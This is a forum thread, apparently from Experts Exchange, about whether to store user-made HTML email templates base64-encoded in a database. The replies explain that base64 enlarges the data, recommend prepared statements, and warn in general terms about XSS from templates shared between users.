Alex Lord
asked on
storing email text based templates as base64_encode and storing in database
PHA+SGV5IChuYW1lKTwvcD4NCg0KDQoNCg0KPHA+VGhhbmsgeW91IGZvciB1c2luZyA8c3Ryb25nPjx1PmNvbXBhbnkmbmJzcDs8L3U+PC9zdHJvbmc+ZGVtbywgd2UgaG9wZSB5b3UgZm91bmQgaXQgd29ydGggd2hpbGUsIGlmIHlvdSB3b3VsZCBsaWtlIGZ1dGhlciBpbmZvbWF0aW9uIHBsZWFzZSBjb250YWN0IHVzPC9wPg0KDQoNCg0KDQo8cD5yZWdhcmRzIHRlc3QgdXNlcjwvcD4NCg0Kbase64_encodeSo i am creating a basic form to allow users to create text based email templates, it does include files and images but only he the format of links which direct the user to the file so it still is text.
i need to store this in a database which i have done. i am wondering is this the best practice ? i am using CKEDITOR to.
or is their a beter way ?
I'm guessing you're using base64 to save a little space.
You can accomplish the same space saving by just using row compressions, which will leave your data in human readable form.
And as lenamtl said, what you're doing will work too.
My preference is to use row compression, so data can be pulled out + used, without doing a base64 decrypt first.
You can accomplish the same space saving by just using row compressions, which will leave your data in human readable form.
And as lenamtl said, what you're doing will work too.
My preference is to use row compression, so data can be pulled out + used, without doing a base64 decrypt first.
Base64 does not save space. Base64 actually wastes space - it increases overall usage by about 33% on average.
I would suggest not using Base64 at all. The whole point of Base64 encoding is to store binary data using printable characters (which is why it takes up more space - you're trying to fit 256 possible values from one byte into multiple bytes that only have 64 possible values each. It's the equivalent of being asked what your favorite color is and being given the choices of "blue", "green", and "red" - but your favorite color is "cyan", so you pick blue AND green (you've picked multiple colors that, when together, make the original one color).
You can still store in in the database, but either use escaping on the value or use a prepared statement / query to insert the value so you're not opening yourself up to SQL injection.
I'd also HEAVILY caution against any sort of cross-user template usage (e.g. user A creates a template and user B can see it). This is just begging to be abused by a malicious user who injects malicious code into a template. Just because the code can be inserted without SQL injection doesn't mean it's safe. A malicious user could inject some Javascript (e.g. in a <script> tag or an event handler like a click or mousemove), and have it redirect a good user to a bad or malicious site or open them up to XSS (e.g. dump cookies to a remote site and allow session hijacking).
You need to be VERY thorough in validating any input from users. Remember that malicious users don't have to play by the rules. It's easy to bypass any client-side validation and restrictions and simply upload whatever data you want, so you need to actually check the results before allowing them to be used.
I would suggest not using Base64 at all. The whole point of Base64 encoding is to store binary data using printable characters (which is why it takes up more space - you're trying to fit 256 possible values from one byte into multiple bytes that only have 64 possible values each. It's the equivalent of being asked what your favorite color is and being given the choices of "blue", "green", and "red" - but your favorite color is "cyan", so you pick blue AND green (you've picked multiple colors that, when together, make the original one color).
You can still store in in the database, but either use escaping on the value or use a prepared statement / query to insert the value so you're not opening yourself up to SQL injection.
I'd also HEAVILY caution against any sort of cross-user template usage (e.g. user A creates a template and user B can see it). This is just begging to be abused by a malicious user who injects malicious code into a template. Just because the code can be inserted without SQL injection doesn't mean it's safe. A malicious user could inject some Javascript (e.g. in a <script> tag or an event handler like a click or mousemove), and have it redirect a good user to a bad or malicious site or open them up to XSS (e.g. dump cookies to a remote site and allow session hijacking).
You need to be VERY thorough in validating any input from users. Remember that malicious users don't have to play by the rules. It's easy to bypass any client-side validation and restrictions and simply upload whatever data you want, so you need to actually check the results before allowing them to be used.
This question needs an answer!
Become an EE member today
7 DAY FREE TRIALMembers can start a 7-Day Free trial then enjoy unlimited access to the platform.
View membership options
or
Learn why we charge membership fees
We get it - no one likes a content blocker. Take one extra minute and find out why we block content.
I'm doing similar to this but using TinyMCE and raw output using the template option that can be embed inside the text editor.
https://www.tiny.cloud/docs/plugins/template/#templates
For my case I'm creating some ready to use template for the user so user only need to select the appropriate template from a list.
Those template are html/php files loaded inside the editor so nothing is saved in DB.